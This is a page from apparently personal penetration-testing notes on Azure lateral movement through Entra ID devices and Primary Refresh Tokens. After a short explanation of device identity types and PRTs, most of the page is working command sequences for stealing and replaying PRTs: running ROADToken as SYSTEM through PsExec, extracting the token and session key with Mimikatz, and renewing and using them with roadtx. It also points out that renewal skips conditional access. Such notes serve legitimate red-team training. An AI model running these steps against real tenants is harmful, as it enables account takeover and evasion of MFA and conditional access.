Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
        • MFASweep
        • GraphRunner
        • Azure SQL databases
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Primary Refresh Token
  • Extract the PRT (Pass-the-PRT)
  • Mimikatz extract PRT, sessionkey and renew using Roadtx
  1. Cloud
  2. Azure
  3. Lateral Movement

Entra ID Devices & Primary Refresh Tokens

PreviousLateral MovementNextDynamic Groups

Last updated 3 months ago

There are three types of device identities:

  1. Microsoft Entra join

These are organization owned devices and heavily managed using Intune. Only Windows 11, 10 and Server 2019 machines running on Azure. These can be accessed using Azure AD accounts.

  1. Microsoft Entra registration

These can be used owned (BYOD) or organization owned. These are lightly managed. Can be Windows 10 or newer, macOS, Ubuntu and mobile devices.

  1. Microsoft Entra hybrid join

Organization owned devices joined to on-premise AD and registered with Entra ID. All supported Windows Desktops en server version

Primary Refresh Token

PRT is a special refresh token used for single sign-on. (SSO). It can be used to obtain access and refresh tokens to any application. It is issued to a user for a specific device. It is valid for 90 days and continuously renewed.

CloudAP SSP on Windows devices requests and caches a PRT on a device.

The idea of SSO is that when you have a Entra ID joined device, you want to be able to access any application without having to provide credentials again

MFA & PRT

If a PRT is MFA-based (Windows Hello or Account managed), then the claim is transferred to app tokens to prevent MFA challenge for every application. This means that if you RDP into a machine, it is not MFA based and the claim is not transferred.

Extract the PRT (Pass-the-PRT)

If we have access to a PRT, it is possible to request access tokens for any application. First check if there is a user AzureAD\username

Get-Process -IncludeUserName

Using ROADToken:

ROADToken.exe <nonce>

Request Nonce:

$TenantId = "2d50cb29-5f7b-48a4-87ce-xxxx"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce

Next, run the following command to execute from system privileges in the session of the Azure AD user ROADToken.exe:

Invoke-Command -Session $infraadminsrv -ScriptBlock{C:\Users\Public\student60\PsExec64.exe -accepteula -s "cmd.exe" " /c C:\Users\Public\student60\SessionExecCommand.exe MichaelMBarron C:\Users\Public\student60\ROADToken.exe AwABEgEAAAADAOz_BQD0_yt2x3cdZplKFPI7ne9soLemwZfxfXDveVCG1B3Zw_irkrK0oTfhPUHZTp0RhL9nrFgBxb3GuXd1jf2v83BptRYgAA > C:\Users\Public\student60\PRT.txt"}

AADInternals

Get-AADIntUserPRTToken

Mimikatz

Sekurlsa::cloudap

Mimikatz extract PRT, sessionkey and renew using Roadtx

First using mimikatz cloudap, extract the key value and the PRT itself:

Sekurlsa::cloudap

Copy the key value and PRT. Next, use dpapito extract the session key:

dpapi::cloudapkd /keyvalue:<VALUE> /unprotect

Finally, use roadtx to renew and save the PRT:

roadtx prt -a renew --prt <PRT> --prt-sessionkey <SESSION-KEY>

When a PRT is renewed conditional access is NOT checked

Now we can request a access token for azure resource manager:

roadtx prtauth -c azps -r azrm --tokens-stdout

Or for MSGraph:

roadtx prtauth -c azps -r msgraph --tokens-stdout

Or open a browser with the token already in place:

roadtx browserprtauth -url https://portal.azure.com

☁️